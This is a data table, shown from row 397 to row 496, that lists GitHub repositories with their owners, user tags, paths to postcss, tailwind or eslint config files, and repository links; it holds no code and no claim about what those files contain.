    397finom/blokfinomUser001postcss.config.mjshttps://github.com/finom/blok
    398rejoan121615/website-generatorrejoan121615User001packages/dashboard/postcss.config.mjshttps://github.com/rejoan121615/website-generator
    399abdullah2310ishaq/personal-portfolioabdullah2310ishaqUser001postcss.config.mjshttps://github.com/abdullah2310ishaq/personal-portfolio
    400Joyeta-Mondal/arklab-ai-assessmentJoyeta-MondalUser001postcss.config.mjshttps://github.com/Joyeta-Mondal/arklab-ai-assessment
    401Adithyahewage/Gym-demoAdithyahewageUser001postcss.config.mjsDemo project for gym clienthttps://github.com/Adithyahewage/Gym-demo
    402Gowreesh-VT/VITopolyGowreesh-VTUser001postcss.config.mjshttps://github.com/Gowreesh-VT/VITopoly
    403farhanmasood-se/slack-clonefarhanmasood-seUser001postcss.config.mjsCollaborate with your team using real-time messaging, rich text editing, and emoji support in this Slack-like app built with Next.js, Convex, and Shadcn UI.https://github.com/farhanmasood-se/slack-clone
    404Socheema/clotSocheemaUser001postcss.config.mjsShop the best fashion products with Clothttps://github.com/Socheema/clot
    405Shumaim-Naseer-Kiyani/project1Shumaim-Naseer-KiyaniUser001postcss.config.mjshttps://github.com/Shumaim-Naseer-Kiyani/project1
    406Muhammad-Hammad-Abbasi/next.js-hackathonMuhammad-Hammad-AbbasiUser001postcss.config.mjshackathon of figma web design.https://github.com/Muhammad-Hammad-Abbasi/next.js-hackathon
    407Germs31/small-traslator-aiGerms31User001postcss.config.mjshttps://github.com/Germs31/small-traslator-ai
    408prudywn/GrowthProjectprudywnUser001frontend/postcss.config.mjshttps://github.com/prudywn/GrowthProject
    409FaizaFarooq23/photo-galleryFaizaFarooq23User001postcss.config.mjshttps://github.com/FaizaFarooq23/photo-gallery
    410dbankston2409/Sober-Deckdbankston2409User001postcss.config.mjshttps://github.com/dbankston2409/Sober-Deck
    411mahadi-zulfiker/Nextjs-Prisma-Portfolio-Frontendmahadi-zulfikerUser001postcss.config.mjsLive websitehttps://github.com/mahadi-zulfiker/Nextjs-Prisma-Portfolio-Frontend
    412seemab-ahmed/blockdagseemab-ahmedUser001postcss.config.mjshttps://github.com/seemab-ahmed/blockdag
    413abdullah2310ishaq/zee-adminabdullah2310ishaqUser001postcss.config.mjshttps://github.com/abdullah2310ishaq/zee-admin
    414lnbglondoncoin/lnbglondonlnbglondoncoinUser001postcss.config.mjshttps://github.com/lnbglondoncoin/lnbglondon
    415ahmadraza382/Ferranoahmadraza382User001postcss.config.mjshttps://github.com/ahmadraza382/Ferrano
    416JPChoyon/bikeBoticsJPChoyonUser002postcss.config.mjs | eslint.config.mjshttps://github.com/JPChoyon/bikeBotics
    417Anas-Ali-3673/caa-interfaceAnas-Ali-3673User001postcss.config.mjshttps://github.com/Anas-Ali-3673/caa-interface
    418akashstwt/fleekakashstwtUser001postcss.config.mjshttps://github.com/akashstwt/fleek
    419wolfstudiosai/havockerwolfstudiosaiUser001postcss.config.mjshttps://github.com/wolfstudiosai/havocker
    420mdemong87/theamfisher-assignmentmdemong87User002postcss.config.mjs | eslint.config.mjshttps://github.com/mdemong87/theamfisher-assignment
    421eftakhar-491/L-2_B-6-Assignment-4-frontendeftakhar-491User001postcss.config.mjshttps://github.com/eftakhar-491/L-2_B-6-Assignment-4-frontend
    422mohsulthana/yc-directory-nextjsmohsulthanaUser001postcss.config.mjshttps://github.com/mohsulthana/yc-directory-nextjs
    423deepaksh798/dashboard-seconddeepaksh798User001postcss.config.mjshttps://github.com/deepaksh798/dashboard-second
    424mahadi-zulfiker/Hishabee_Frontend_Taskmahadi-zulfikerUser001postcss.config.mjsLive Sitehttps://github.com/mahadi-zulfiker/Hishabee_Frontend_Task
    425Ibraz94/inventory_management_systemIbraz94User001frontend/postcss.config.mjshttps://github.com/Ibraz94/inventory_management_system
    426mdnuruzzamannirob/your-capture-awardsmdnuruzzamannirobUser001postcss.config.mjshttps://github.com/mdnuruzzamannirob/your-capture-awards
    427Germs31/expense-trackingGerms31User001postcss.config.mjshttps://github.com/Germs31/expense-tracking
    428Adharshms/builderAdharshmsUser002postcss.config.mjs | eslint.config.mjshttps://github.com/Adharshms/builder
    429Nathanim1919/Avaitor-gameNathanim1919User001client/postcss.config.mjshttps://github.com/Nathanim1919/Avaitor-game
    430saifullah-max/Navo-1saifullah-maxUser001postcss.config.mjshttps://github.com/saifullah-max/Navo-1
    431kanchana404/webkanchana404User001postcss.config.mjshttps://github.com/kanchana404/web
    432kanchana404/kaidenz-clothingkanchana404User001postcss.config.mjshttps://github.com/kanchana404/kaidenz-clothing
    433Muhammad-Hammad-Abbasi/persnol_portfolio_2Muhammad-Hammad-AbbasiUser001postcss.config.mjspersnal_portfoliohttps://github.com/Muhammad-Hammad-Abbasi/persnol_portfolio_2
    434Salman1205/MailAssists-CRMSalman1205User001postcss.config.mjshttps://github.com/Salman1205/MailAssists-CRM
    435SouravDn-p/Innovative-task-sd246SouravDn-pUser001postcss.config.mjsA taskEarn websitehttps://github.com/SouravDn-p/Innovative-task-sd246
    436mahadi-zulfiker/PH-Job-Task-Web-Instructormahadi-zulfikerUser001postcss.config.mjsLive websitehttps://github.com/mahadi-zulfiker/PH-Job-Task-Web-Instructor
    437mahadi-zulfiker/Raintor-Job-Taskmahadi-zulfikerUser001postcss.config.mjsLive websitehttps://github.com/mahadi-zulfiker/Raintor-Job-Task
    438mahadi-zulfiker/SparkTech-Job-Taskmahadi-zulfikerUser001postcss.config.mjsLive Sitehttps://github.com/mahadi-zulfiker/SparkTech-Job-Task
    439seemab-ahmed/oradentclinic-websiteseemab-ahmedUser001postcss.config.mjshttps://github.com/seemab-ahmed/oradentclinic-website
    440AhmadRazaKhokhar1/url-shortner-frontendAhmadRazaKhokhar1User001postcss.config.mjshttps://github.com/AhmadRazaKhokhar1/url-shortner-frontend
    441nipun-imesh/Fly-connects-web-FNnipun-imeshUser001tailwind.config.jshttps://github.com/nipun-imesh/Fly-connects-web-FN
    442Barosz30/PortfolioBarosz30User001tailwind.config.jshttps://github.com/Barosz30/Portfolio
    443web-ghoul/movie-appweb-ghoulUser001tailwind.config.jshttps://github.com/web-ghoul/movie-app
    444Dawit212119/DMSDawit212119User001client/tailwind.config.jsNextjs,express,prismahttps://github.com/Dawit212119/DMS
    445Al-amin07/project_4_frontendAl-amin07User001tailwind.config.jshttps://github.com/Al-amin07/project_4_frontend
    446zeeshanrafiqrana/metropolis-arena-frontendzeeshanrafiqranaUser001tailwind.config.jsMetropolis Arena Interactive Event Seating Map — Front-End Take-Home Taskhttps://github.com/zeeshanrafiqrana/metropolis-arena-frontend
    447Wasee-Ur-Rehman/DarziXpressWasee-Ur-RehmanUser001client/tailwind.config.jsOnline Tailor & Clothing Alteration Servicehttps://github.com/Wasee-Ur-Rehman/DarziXpress
    448Flitzinteractive/FlitzSpaceFlitzinteractiveUser001client/tailwind.config.jshttps://github.com/Flitzinteractive/FlitzSpace
    449addygeek/Walmart-Inventory-Clearance-OptimizeraddygeekUser001frontend/tailwind.config.jsSmart inventory and expiry management dashboard for retail stores like Walmart — detect, track, and optimize clearance items with urgency scoring and role-based access.https://github.com/addygeek/Walmart-Inventory-Clearance-Optimizer
    450Iambilalfaisal/PortfolioIambilalfaisalUser001tailwind.config.jsMy portfoliohttps://github.com/Iambilalfaisal/Portfolio
    451malikjunaidhassann/updated-calcos-frontendmalikjunaidhassannUser001tailwind.config.jshttps://github.com/malikjunaidhassann/updated-calcos-frontend
    452SimalChaudhari/plusfiveSimalChaudhariUser001tailwind.config.jsplusfivehttps://github.com/SimalChaudhari/plusfive
    453Hassam-01/Forsit-taskHassam-01User001tailwind.config.jshttps://github.com/Hassam-01/Forsit-task
    454shahvezjumani/chat_appshahvezjumaniUser001tailwind.config.jshttps://github.com/shahvezjumani/chat_app
    455hunain25/QuickFistAidhunain25User001tailwind.config.jshttps://github.com/hunain25/QuickFistAid
    456cyhammad/rapid-appliances-repairscyhammadUser001tailwind.config.jshttps://github.com/cyhammad/rapid-appliances-repairs
    457MohamedH1000/ethaq_ecommerce_adminMohamedH1000User001tailwind.config.jshttps://github.com/MohamedH1000/ethaq_ecommerce_admin
    458acanaveras/autonomous_5g_slicingacanaverasUser001NeMo-Agent-Toolkit-UI/tailwind.config.jsNew repository for troubleshootinghttps://github.com/acanaveras/autonomous_5g_slicing
    459Gethmi-Rathnayaka/AventudeGethmi-RathnayakaUser001session001-fe/tailwind.config.jshttps://github.com/Gethmi-Rathnayaka/Aventude
    460Atik203/My-Anime-ClientAtik203User001tailwind.config.jshttps://github.com/Atik203/My-Anime-Client
    461lihiniapsara/Spotify-ClonelihiniapsaraUser001tailwind.config.jshttps://github.com/lihiniapsara/Spotify-Clone
    462dhruvmalik007/small-case_preEthDelhidhruvmalik007User001apps/web/tailwind.config.jssubmission for the EthGlobal Delhi hackathonhttps://github.com/dhruvmalik007/small-case_preEthDelhi
    463jbaze/Eli-rfq-systemjbazeUser001rfq-app/tailwind.config.jshttps://github.com/jbaze/Eli-rfq-system
    464DamikaDeshan/FaceDetectionClientDamikaDeshanUser001tailwind.config.jshttps://github.com/DamikaDeshan/FaceDetectionClient
    465morokoli/color-chromemorokoliUser001tailwind.config.jshttps://github.com/morokoli/color-chrome
    466rmcsharry/mermcsharryUser001frontend/tailwind.config.jsMy portfoliohttps://github.com/rmcsharry/me
    467JudeTejada/snapdocsJudeTejadaUser001apps/frontend/tailwind.config.jshttps://github.com/JudeTejada/snapdocs
    468mohsinyzonetechnology-dev/workFlow-managementmohsinyzonetechnology-devUser001client/tailwind.config.jshttps://github.com/mohsinyzonetechnology-dev/workFlow-management
    469anilgoswamistartbitsolutions/bolt-novel-merryanilgoswamistartbitsolutionsUser001tailwind.config.jshttps://github.com/anilgoswamistartbitsolutions/bolt-novel-merry
    470spacecode-library/nurse-nestspacecode-libraryUser001tailwind.config.jshttps://github.com/spacecode-library/nurse-nest
    471jesus270/Krain-MVP-v1jesus270User001apps/landing/tailwind.config.jshttps://github.com/jesus270/Krain-MVP-v1
    47201aksh/jobPilotFrontend01akshUser001tailwind.config.jsReactJS, TailwindCSS,Typescripthttps://github.com/01aksh/jobPilotFrontend
    473kiranmistary0697/Stratezy_labkiranmistary0697User001tailwind.config.jshttps://github.com/kiranmistary0697/Stratezy_lab
    474aviel9552/plusfive-frontendaviel9552User001tailwind.config.jsplusfive-frontendhttps://github.com/aviel9552/plusfive-frontend
    475MohamedH1000/ethaq_ecommerceMohamedH1000User001tailwind.config.jshttps://github.com/MohamedH1000/ethaq_ecommerce
    476amit-biswas-1992/joykoly-test-appamit-biswas-1992User001tailwind.config.jsReact Native Joykoly Academy App with Dashboard, Exams, and API Integrationhttps://github.com/amit-biswas-1992/joykoly-test-app
    477seemab-ahmed/eden-fundedseemab-ahmedUser001tailwind.config.jshttps://github.com/seemab-ahmed/eden-funded
    478Professor833/orchestrixProfessor833User001frontend/tailwind.config.jsAI workflow Automation Platformhttps://github.com/Professor833/orchestrix
    479rajkananirk/personal-finance-noderajkananirkUser001tailwind.config.jshttps://github.com/rajkananirk/personal-finance-node
    480Ali-Hamas/AI-Learn-HubAli-HamasUser001frontend/tailwind.config.jsPremium AI Learning Platform - AI LearnHubhttps://github.com/Ali-Hamas/AI-Learn-Hub
    481gSimani/ConcordBrokergSimaniUser002apps/web/tailwind.config.js | backups/apps_web_before_master_/tailwind.config.jsExtract CRE and Residential informationhttps://github.com/gSimani/ConcordBroker
    482syed-zaeem/fyp-frontendsyed-zaeemUser001Project Frontend/tailwind.config.jsThis is the frontend for the FYP.https://github.com/syed-zaeem/fyp-frontend
    483developerDesinger/Scrapping-Dashboard-FrontenddeveloperDesingerUser001tailwind.config.jsFrontend for the Scrapping Dashboard app.https://github.com/developerDesinger/Scrapping-Dashboard-Frontend
    484jade0615/Bookmejade0615User001frontend/tailwind.config.jshttps://github.com/jade0615/Bookme
    485jbaze/prject-hejer-image-uploadjbazeUser001image-upload-feature-angular/tailwind.config.jshttps://github.com/jbaze/prject-hejer-image-upload
    486Atik203/Quiz-Taker-ClientAtik203User001tailwind.config.jshttps://github.com/Atik203/Quiz-Taker-Client
    487dhruvmalik007/smallcase_defidhruvmalik007User001apps/web/tailwind.config.jssubmission for the EthGlobal Delhi hackathon project : Building thematic industry based mutual funds composed of various defi portfolioshttps://github.com/dhruvmalik007/smallcase_defi
    488Ali-Hamas/VPS-ErrorAli-HamasUser001frontend/tailwind.config.jshttps://github.com/Ali-Hamas/VPS-Error
    489Atik203/My-Anime-ServerAtik203User001eslint.config.mjshttps://github.com/Atik203/My-Anime-Server
    490Al-amin07/ci-cdAl-amin07User001eslint.config.mjshttps://github.com/Al-amin07/ci-cd
    491parthvaghani/vinayaknaturals-apiparthvaghaniUser001eslint.config.mjshttps://github.com/parthvaghani/vinayaknaturals-api
    492Success0452/NestAssessmentSuccess0452User001eslint.config.mjshttps://github.com/Success0452/NestAssessment
    493arif1101/AadilPay-backendarif1101User001eslint.config.mjshttps://github.com/arif1101/AadilPay-backend
    494pratikp72/strollr-apppratikp72User001eslint.config.mjshttps://github.com/pratikp72/strollr-app
    495anilgoswamistartbitsolutions/firebasebase-auth-and-storeanilgoswamistartbitsolutionsUser001eslint.config.mjshttps://github.com/anilgoswamistartbitsolutions/firebasebase-auth-and-store
    496Logixbuilttech/payload_postsLogixbuilttechUser001eslint.config.mjshttps://github.com/Logixbuilttech/payload_posts